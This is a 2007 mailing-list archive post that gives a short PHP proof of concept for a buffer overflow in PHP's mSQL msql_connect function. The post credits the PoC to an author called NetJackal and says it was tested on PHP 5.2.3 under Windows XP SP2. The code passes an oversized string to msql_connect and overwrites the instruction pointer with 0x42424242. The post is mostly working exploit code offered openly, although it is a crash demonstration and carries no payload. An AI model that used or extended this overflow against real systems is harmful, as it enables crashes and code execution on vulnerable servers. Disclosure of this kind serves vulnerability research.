|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
nima_501
yahoo.com
Date: Sat Aug 04 2007 - 23:51:11 CDT
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
<?php
##########################################################
###----------------------------------------------------###
###----PHP mSQL (msql_connect) Buffer Overflow PoC-----###
###----------------------------------------------------###
###-Tested on 5.2.3 (XP SP2)---------------------------###
###----------------------------------------------------###
###-Author:--NetJackal---------------------------------###
###-Email:---nima_501[at]yahoo[dot]com-----------------###
###-Website:-http://netjackal.by.ru--------------------###
###----------------------------------------------------###
##########################################################
if(!function_exists('msql_connect'))
die('mSQL extension is not available');
#msql_pconnect(str_repeat('A',49424).'BBBB');
msql_connect(str_repeat('A',49424).'BBBB'); # EIP => 42424242
?>
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]